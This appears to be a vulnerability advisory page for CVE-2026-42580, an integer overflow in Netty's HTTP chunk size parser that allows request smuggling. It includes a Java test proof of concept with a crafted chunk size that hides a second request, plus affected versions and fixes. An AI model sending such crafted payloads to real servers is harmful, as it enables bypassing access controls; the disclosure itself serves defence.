CVE-2026-42580: Netty: HTTP Request Smuggling due to incorrect chunk size parsing

Published May 7, 2026
·
Updated

### Summary Netty's chunk size parser silently overflows int, enabling request smuggling attacks. ### Details io.netty.handler.codec.http.HttpObjectDecoder#getChunkSize silently overflows int. The size is accumulated as follows: result *= 16; result += digit; The result is checked only for negative values. However, with a carefully crafted chunk size, the result can be a valid size. ### PoC The test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a chunked body. ```java @Test public void test() { String requestStr = "POST / HTTP/1.1\r\n" + "Host: localhost\r\n" + "Transfer-Encoding: chunked\r\n\r\n" + "100000004\r\n" + "test\r\n" + "0\r\n" + "\r\n" + "GET /smuggled HTTP/1.1\r\n" + "Host: localhost\r\n" + "Content-Length: 0\r\n" + "\r\n"; EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder()); assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII))); // Request 1 HttpRequest request = channel.readInbound(); assertTrue(request.decoderResult().isSuccess()); HttpContent content = channel.readInbound(); assertTrue(content.decoderResult().isSuccess()); assertEquals("test", content.content().toString(CharsetUtil.US_ASCII)); content.release(); LastHttpContent last = channel.readInbound(); assertTrue(last.decoderResult().isSuccess()); last.release(); // Request 2 request = channel.readInbound(); assertTrue(request.decoderResult().isSuccess()); last = channel.readInbound(); assertTrue(last.decoderResult().isSuccess()); last.release(); } ``` ### Impact HTTP Request Smuggling: Attacker injects arbitrary HTTP requests

Affected Software

4 affected componentsFixes available
maven/io.netty:netty-codec-http<=4.1.132.Final
4.1.133.Final
maven/io.netty:netty-codec-http>=4.2.0.Alpha1<=4.2.12.Final
4.2.13.Final
Netty Netty<4.1.133
Netty Netty>=4.2.0<4.2.13

Event History

May 7, 2026
Advisory Published
via GitHub·12:13 AM
Data Sourced
via GitHub·12:13 AM
DescriptionSeverityWeaknessAffected Software
May 13, 2026
CVE Published
via MITRE·06:04 PM
Data Sourced
via MITRE·06:04 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·07:17 PM
DescriptionSeverityWeaknessAffected Software
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-42580?

CVE-2026-42580 has a high severity due to its potential to enable request smuggling attacks.

2

How do I fix CVE-2026-42580?

To fix CVE-2026-42580, upgrade to io.netty:netty-codec-http version 4.1.133.Final or 4.2.13.Final.

3

What does CVE-2026-42580 affect?

CVE-2026-42580 affects versions of io.netty:netty-codec-http up to 4.1.132.Final and between 4.2.0.Alpha1 and 4.2.12.Final.

4

What type of attack does CVE-2026-42580 enable?

CVE-2026-42580 enables request smuggling attacks due to integer overflow in the chunk size parser.

5

What is the cause of CVE-2026-42580?

CVE-2026-42580 is caused by the silent overflow of an integer in the chunk size parser of Netty.

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203